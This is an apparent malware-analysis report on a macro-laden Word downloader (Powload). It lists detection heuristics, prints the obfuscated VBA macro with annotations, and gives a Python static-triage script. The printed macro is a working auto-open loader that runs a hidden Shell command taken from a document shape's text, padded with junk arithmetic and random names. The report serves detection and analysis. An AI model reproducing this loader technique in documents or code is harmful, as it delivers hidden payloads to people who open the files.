Verdict: MALICIOUS
Risk score: 252

Heuristics (9)

- ClamAV: Doc.Downloader.Powload-6827911-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware, signature Doc.Downloader.Powload-6827911-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:

      _ .Shell(tZpBSOp, YiwKOUhdcE), iNwiZmJ) nIzlzLjRRwwfGPwUNqdpSL = (211213285 + Round(kVcrOljVzqooWtJv) * 28296831 - rUBEAFmoilwjUbcqB + (ipDjMbiPbKwTjhlBUMHf / Tan(WFZGwWQWMMfsjNPMKH)))

  The matched fragment is the tail of an Interaction.Shell call that the macro splits across eight "_" continuation lines (see the preview below), so the string "Interaction.Shell" never appears on a single line. Its first argument, tZpBSOp, is built from VQGNO.TextFrame.TextRange, the text of a drawing shape obtained through Shapes(...); the command string therefore lives in the document body, not in the macro source. Its second argument is declared Const YiwKOUhdcE = 0, which is vbHide, so the spawned process gets no visible window.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample the VBA source was also recovered (macros.bas below), so this finding corroborates the source-level matches rather than standing alone.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:

      Attribute VB_Customizable = True Sub autoopen() DwQka

  Sub autoopen() runs when the document is opened and does nothing except call DwQka, the function that performs the shape lookup and the Shell call.
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag. No matched line is reported for this finding and the recovered macro source contains no cmd.exe string; since the Shell argument is read from a document shape, the match most likely came from document content rather than from the macro text.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule's description conflicts with the rest of the report: a VBA project was recovered (macros.bas below) and it contains the autoopen routine, so treat this as a duplicate of the OLE_VBA_AUTOOPEN match rather than as independent evidence.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. For this sample the artifact is macros.bas, flagged for name-mangling obfuscation (see Extracted artifacts).
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier, present in any Office document that contains drawing objects (consistent with the shape this macro reads its command from); it is not a network indicator and should not be blocked or treated as command-and-control.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5035 bytes |

SHA-256: 81d7e5aa0ee5b497bfe91f5ebfb55a58e543603b11f240ae6a07b051be416b7e

Detection (macros.bas)
- ClamAV: No threats found. The Powload signature above fired on the parent document, not on the extracted macro text, so the absence of a hit here does not weaken the verdict.
- Obfuscation or payload: likely. 134 of 175 identifiers look randomly generated (e.g. 'olDfNfVtvkimNrnjXizKXEYw'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
```vba
Attribute VB_Name = "VHFAFRowhP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: auto-exec entry point; Word runs autoopen when the document is opened.
Sub autoopen()
DwQka
End Sub
Attribute VB_Name = "DUIGPqkX"
' Analyst note: every "X = (N + Round(a) * N - b + (c / Tan(d)))" and "X = N" line below
' is dead filler whose result is never read; only the commented statements matter.
Function DwQka()
On Error Resume Next
IOzpGdrzWMwYPmvwOwAbXQ = (61575601 + Round(UjzfoinsjifmztbzjMoa) * 166687881 - RhhArbMsQsFUVWiLJ + (YFohHJwUUDuLbiEESRwnmMf / Tan(RnhfYFTVDvBTbkZYDWGJzFQ)))
QREMNVFMZwPUbRvPjZ = 54968547
ZPXiilJmQwNNqoMSurMhu = (234738427 + Round(bCJInfFQEUCmMowhYDL) * 233198629 - BKAiPwriihmqpv + (UcVGLjIsoBziwJoijAW / Tan(sJiYjOhamPwXsWMvhFY)))
sRMcQSuZpCDpTVjLwz = 150569958
pOcRarrqzMmizp = (92621964 + Round(VPnUjRdlVwziqbRHiklczGWs) * 335476405 - rKjInAsHhoKzSXkrvirIzW + (izNDlwPtvVuaTCNJwpjudzhR / Tan(rFKsAqqVOEIZzHISu)))
cYwRpiUtTQbShSvot = 298921295
loGplaIpKXEzvtYmTJDl = (151952967 + Round(fHjthpEjIBBjVqrCsUVwzSf) * 223335377 - OBUpEYzFuJzGrsSliOCv + (XivRQiPasNbBOSnjr / Tan(dBabjsvAcCLUDc)))
PrTZXnpkfCwXFdZiCnKZup = 315166853
MJbOFrTLOoOHZcPYzmPl = (239098102 + Round(LWcbowlmPjpqdBPPfBRilvl) * 37470103 - tCEirYWtSwEmiDXZcYhS + (wNIiHNTGIPlWwutjHXISw / Tan(DKdAwuEJWDmuupww)))
KDnJiTPfIisUAZAlnKwEG = 104616061
' Look up the drawing shape whose text holds the command string.
Set VQGNO = VHFAFRowhP.Shapes(qXCXJh + "FrXXBbPlWaco" + DravSWBXj)
BjVbUYHYiiiJnYXjzcj = (288618690 + Round(absaNXVTQoNddfnCiBGQdVFj) * 251152949 - vhVzmaAdaEdAHBmFOtRfKsj + (UacbSEWIoVbowRCmdzEi / Tan(duFiYHLSGhCzqiLwZLW)))
VMlZzGzqiCKoBFrjXwtwK = 278761034
ZTdXfuVAsFSkIZpPvLjTLwp = (148786727 + Round(ZwaSiDVfHfKjdtOG) * 334634703 - cwbpmMrqPFcfbiGKG + (viOCwFBuijSSRNMjMYlkMNb / Tan(nQDbEfZSmTKQBaBWoshIXz)))
OTsSiZVihHZOjBZpzJAfzC = 315146659
QOjZBnWiihLoViSGSIFCAijO = (182120184 + Round(niAAcocRiJrGAzuPZ) * 80498221 - GdQillELKzifRzkzsd + (FWLDzIPMIFHkJWuVoXvP / Tan(XcSSwiZIQACluGwuZ)))
aVYwGDOYIXcvcwOPi = 306270962
pCdRJuWzLObWIcYlLdaTzV = (333162951 + Round(AIviNIiNqnicBjr) * 80746834 - LobXAzYdoLOpImUDYQB + (olDfNfVtvkimNrnjXizKXEYw / Tan(YiAOYdPqNnalvJVcih)))
hcbQznjqRrbjMG = 71859009
iTFiUQzNBAQqEGZuLXzMVHP = (225592457 + Round(VLpEqUnSatotjcCiMJkbOM) * 212729018 - nBUtFXXEXrzEIJLfcYiNl + (fuvdIziHZIfERp / Tan(uMDVkVodzaDwFwpiTwlVawcO)))
ZQRqYDsVjiLarBfrQzD = 35591596
wzVZNmwHtYnoijlvYCnzmf = (41740816 + Round(zfvPXrObGpmOrzWRZHICjE) * 195912016 - TzHzwmDSshZirhjB + (LhttXEZfWafWDHuB / Tan(wXkRfUmUVJZnZsXHtVXkR)))
vhRZLYvpZihHlMQsjNHZCuzr = 320544954
MZmGaBvjRzUtZmdkA = (216537239 + Round(iqWbURnSHzYwfPCdmkDF) * 68929527 - tzETQzQjjdFnZXqzS + (njnjtApdWIrAwbUTzYXBBo / Tan(YRurrqinpSOSbb)))
EEdmcHsjjiSFaRaQ = 259155211
kNsaEtBVKElibvYJwNnaG = (170906443 + Round(aciwrBwnpcWadIOFkq) * 158358767 - dowCWHVqtdPiKsRzZzJUNQv + (FUvAhIDjiismic / Tan(jfFuMMrQkqRfmjDiMsw)))
BMVIlajwcAfTzXZpHWjpNEKJ = 111427079
QawTvAvQhqlbwaVwE = (7062957 + Round(CdPQZLQQEjLbLzRhbNYM) * 56563000 - BqdAJVYjjGMUGoAKYHikq + (WPZifttkjoUUcZmYBvsX / Tan(FOqqcjRpQhYrUT)))
afqinvZYAlLbXzGjr = 122703699
' Second Shell argument: window style 0 = vbHide (no visible window).
Const YiwKOUhdcE = 0
bJpdQlmvnNYLsiamEjriiAjV = (333880191 + Round(OICRVwARSoaYEF) * 54176244 - nGCGlqdFaBozPad + (iNWdtWscKaLlLjbmVa / Tan(ZSsSYfwrTIBCsLHt)))
iiOROavLirutZBdoNDAmuzw = 317538526
iihWlJsjlIiGFIPERDJFf = (115039645 + Round(aGWZlwOitnaSCrUQFzHCJbtD) * 56151308 - ElTqwENiHPOkGnWZoTiqNN + (mEGXPmwNTQwrdPDqWFUjEBUs / Tan(fkmaYScrnjmpjwvJCv)))
KvtJlcHksdtkjNCjBL = 255530771
LthiNlLoRzfnSM = (295693242 + Round(VmJUiVNqEImjNQwQ) * 56145889 - UZELrBbWzrbBfZkHWVjTU + (jrZEwbbBzOfksTFJuIsMVV / Tan(DdMzFtdkoNitMmnCA)))
wsMWvhQBNaXaITKcWblcVHWd = 278843405
' First Shell argument: the shape text, concatenated with never-assigned (Empty) variables that add nothing.
tZpBSOp = VQGNO.TextFrame.TextRange + jhfiE + sWHFsQX + NOFKi + LRXaqV + whZptFtR + ZTqJqSR + QcQDsI + oUpjHTAI + upkvfOOA + SLiJPCS
cCCpRhFCwXzLCzQwSVNnQj = (66237813 + Round(NUwtVkUfpihZbv) * 55126517 - IYKbtjZOJZrcUHVtsCbzjM + (NDUVTRrVXNYfsZiGhujkv / Tan(rKiMohZTLFwqwXYKFwSEUPv)))
dUJvuCzblUMJnHdKvDCS = 232236214
RcniSzHGbGDFszWVwVEsk = (332208448 + Round(cfVBiqpRstwMOtl) * 250628443 - ptTnpzVSvrAEAt + (STKzzwcQlpLMvnIbMjADqiUn / Tan(AiiwpMrAztuimoHMdhzd)))
ZfnPnVAqGowXSzNuRwdTMv = 305665452
biSjTuVOYJZnJANwSHWojon = (318748418 + Round(tJJBJZwNYDXQQjqjmTEa) * 295453190 - LbEzljsKnuVAakM + (PjcakwpjCXjEtViW / Tan(ozhzKoNVOQcvPIFXZDUzSU)))
lXwNDnQRLzNlnfOFv = 97598160
YJmSitMPwAwTzqTKiIPmM = (44804386 + Round(YQBvtKJjbUoaKVqlSQi) * 205454690 - AuYWtzMnUIVRhOBdwSEnUXz + (QJorWwVibkXWcZAL / Tan(sHLTIcGpIUwZrWduNFjKUQXm)))
pwriAZRtqbQnrHjiCNcXIj = 90772892
' Interaction.Shell(command, vbHide), split across eight "_" continuation lines so the
' call never appears on one line; the Array() result it sits in is never used.
jMlnOah = Array(ROYUUi, ZNaKhzwQv, WSsLw, Interaction _
 _
 _
 _
 _
 _
 _
 _
 .Shell(tZpBSOp, YiwKOUhdcE), iNwiZmJ)
nIzlzLjRRwwfGPwUNqdpSL = (211213285 + Round(kVcrOljVzqooWtJv) * 28296831 - rUBEAFmoilwjUbcqB + (ipDjMbiPbKwTjhlBUMHf / Tan(WFZGwWQWMMfsjNPMKH)))
WkicpKEQvSHQiVHLjia = 91659747
ipaAdzYHVQnjIll = (317709435 + Round(MBosXwWjcUamtj) * 251530093 - kLRvAspiULKNRLjY + (JwVSMGtDQBczUbj / Tan(UXaUADULJXMlJR)))
lBdkkQtXEXsjrNjAj = 176094986
End Function
```
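The two artifact-level observations above, the random-identifier ratio under Detection and the Shell sink buried in arithmetic filler in the preview, can be reproduced with a small static triage script. The following is an added example, not the analyzer's own code. It runs on a trimmed excerpt of the preview (constructed inline from the lines shown above), joins the "_" continuation lines, strips dead arithmetic statements with a dead-store check, flags random-looking identifiers with a consonant-run heuristic (an assumption; the analyzer's actual heuristic is not described on the page), and back-traces both arguments of Interaction.Shell to the shape lookup and the hidden window-style constant. All function names, thresholds and the keyword list are the example's own.

```python
import re

# Constructed sample: a trimmed excerpt of the macro shown in the report preview.
MACRO_EXCERPT = '''Attribute VB_Name = "DUIGPqkX"
Function DwQka()
On Error Resume Next
IOzpGdrzWMwYPmvwOwAbXQ = (61575601 + Round(UjzfoinsjifmztbzjMoa) * 166687881 - RhhArbMsQsFUVWiLJ + (YFohHJwUUDuLbiEESRwnmMf / Tan(RnhfYFTVDvBTbkZYDWGJzFQ)))
QREMNVFMZwPUbRvPjZ = 54968547
Set VQGNO = VHFAFRowhP.Shapes(qXCXJh + "FrXXBbPlWaco" + DravSWBXj)
Const YiwKOUhdcE = 0
tZpBSOp = VQGNO.TextFrame.TextRange + jhfiE + sWHFsQX
jMlnOah = Array(ROYUUi, ZNaKhzwQv, WSsLw, Interaction _
 _
 .Shell(tZpBSOp, YiwKOUhdcE), iNwiZmJ)
ipaAdzYHVQnjIll = (317709435 + Round(MBosXwWjcUamtj) * 251530093 - kLRvAspiULKNRLjY + (JwVSMGtDQBczUbj / Tan(UXaUADULJXMlJR)))
End Function
'''

VBA_WORDS = {"Attribute", "VB_Name", "Function", "End", "Sub", "On", "Error", "Resume", "Next",
             "Set", "Const", "Array", "Round", "Tan", "Interaction", "Shell", "Shapes",
             "TextFrame", "TextRange"}  # keywords/builtins used in the excerpt, not user names
PURE_FUNCS = {"Round", "Tan", "Abs", "Int", "Sqr", "Sin", "Cos"}  # side-effect free
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
SHELL_RE = re.compile(r"\bShell\s*\(\s*(\w+)\s*,\s*(\w+)")

def join_continuations(src):
    """Merge '_' continuation lines (including bare ' _' lines) into statements."""
    stmts, buf = [], ""
    for raw in src.splitlines():
        line = raw.strip()
        if line.endswith("_"):
            buf += line[:-1].rstrip() + " "
            continue
        buf += line
        if buf.strip():
            stmts.append(re.sub(r"\s+\.", ".", buf).strip())
        buf = ""
    return stmts

def identifiers(stmt):
    """User identifiers in a statement, ignoring string literals."""
    return [t for t in IDENT_RE.findall(re.sub(r'"[^"]*"', '""', stmt)) if t not in VBA_WORDS]

def looks_random(name, min_len=6, max_run=5):
    """Assumed heuristic (not the analyzer's): max_run+ consecutive consonants in a long name."""
    if len(name) < min_len:
        return False
    run = longest = 0
    for ch in name:
        run = 0 if ch in "aeiouAEIOU" or not ch.isalpha() else run + 1
        longest = max(longest, run)
    return longest >= max_run

def assignment_target(stmt):
    m = re.match(r"(?:Set|Const)?\s*([A-Za-z_]\w*)\s*=", stmt)
    return m.group(1) if m else None

def classify(stmts):
    """Filler = assignment never read elsewhere whose only calls are pure math; the
    Array(...Shell(...)) line is also a dead store but stays live because Shell is impure."""
    ident_sets = [set(identifiers(s)) for s in stmts]
    filler, live = [], []
    for i, stmt in enumerate(stmts):
        target = assignment_target(stmt)
        calls = set(CALL_RE.findall(stmt))
        read = any(target in ids for j, ids in enumerate(ident_sets) if j != i)
        dead = bool(target) and not read and calls <= PURE_FUNCS
        (filler if dead else live).append(stmt)
    return filler, live

def backtrace(stmts, name, seen=None):
    """Backward slice: the statements that define `name`, recursively."""
    seen = set() if seen is None else seen
    chain = []
    for stmt in stmts:
        if assignment_target(stmt) == name and stmt not in seen:
            seen.add(stmt)
            chain.append(stmt)
            for dep in identifiers(stmt):
                if dep != name:
                    chain.extend(backtrace(stmts, dep, seen))
    return chain

def triage(src):
    stmts = join_continuations(src)
    filler, live = classify(stmts)
    names = sorted({n for s in stmts for n in identifiers(s)})
    sinks = []
    for stmt in live:
        m = SHELL_RE.search(stmt)  # Shell(command, windowstyle)
        if m:
            sinks.append({"statement": stmt,
                          "command_from": backtrace(stmts, m.group(1)),
                          "window_style_from": backtrace(stmts, m.group(2))})
    return {"identifiers_random": sum(map(looks_random, names)), "identifiers_total": len(names),
            "filler": filler, "live": live, "sinks": sinks}

if __name__ == "__main__":
    for sink in triage(MACRO_EXCERPT)["sinks"]:
        print(sink["statement"], *sink["command_from"], *sink["window_style_from"], sep="\n  <- ")
```

On the excerpt the script strips the three arithmetic statements, reports 16 of 25 user identifiers as random-looking, and traces the Shell command string back through tZpBSOp to the Shapes(...) lookup and the window style back to Const YiwKOUhdcE = 0. The dead-store rule deliberately does not match on the filler's textual shape, so it also removes other junk patterns; the consonant-run rule will produce occasional false positives on legitimate names and is meant as a triage ratio, not a per-name verdict.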